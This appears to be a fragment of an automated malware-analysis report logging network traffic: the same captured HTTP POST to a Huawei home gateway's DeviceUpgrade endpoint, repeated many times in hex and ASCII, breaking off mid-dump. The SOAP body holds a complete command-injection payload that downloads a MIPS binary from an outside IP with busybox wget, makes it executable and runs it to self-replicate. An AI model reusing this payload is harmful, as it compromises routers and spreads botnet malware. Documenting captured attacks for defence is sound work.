2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 